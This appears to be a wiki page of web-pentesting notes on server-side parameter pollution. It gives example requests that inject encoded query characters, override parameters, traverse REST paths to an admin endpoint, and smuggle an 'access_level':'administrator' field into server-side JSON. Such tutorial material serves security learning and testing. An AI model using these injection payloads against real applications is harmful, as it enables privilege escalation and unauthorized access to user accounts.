Server Side Parameter Pollution

Place query syntax characters like #, &, and = in your input and observe how the application responds

Example:

It's essential that you URL-encode the # character. Otherwise the front-end application will interpret it as a fragment identifier and it won't be passed to the internal API.

GET /userSearch?name=peter&back=/home

1 - Try

GET /userSearch?name=peter%23foo&back=/home

GET /userSearch?name=peter%26foo=xyz&back=/home

2 - If you've identified the email parameter, you could add it to the query string 

GET /userSearch?name=peter%26email=foo&back=/home

Overriding parameters

GET /userSearch?name=peter%26name=carlos&back=/home

  • PHP parses the last parameter only. This would result in a user search for carlos.

  • ASP.NET combines both parameters. This would result in a user search for peter,carlos, which might result in an Invalid username error message.

  • Node.js / express parses the first parameter only. This would result in a user search for peter, giving an unchanged result.

REST Paths

GET /edit_profile.php?name=peter%2f..%2fadmin

This may result in the following server-side request:

GET /api/private/users/peter/../admin

Structured data

Example 1

POST /myaccount
name=peter

# Server Side:

PATCH /users/7312/update 
{"name":"peter"}

You can attempt to add the access_level parameter to the request as follows:

POST /myaccount 
name=peter","access_level":"administrator

If the user input is added to the server-side JSON data without adequate validation or sanitization, this results in the following server-side request:

PATCH /users/7312/update 
{name="peter","access_level":"administrator"}

Example 2

POST /myaccount
{"name": "peter"}

# Server Side

PATCH /users/7312/update
{"name":"peter"}

Add access_level

POST /myaccount
{"name": "peter\",\"access_level\":\"administrator"}

# Server side

PATCH /users/7312/update
{"name":"peter","access_level":"administrator"}

Burp Extension - Backslash Powered Scanning

PreviousMass AssignmentNextIDOR

Last updated

Was this helpful?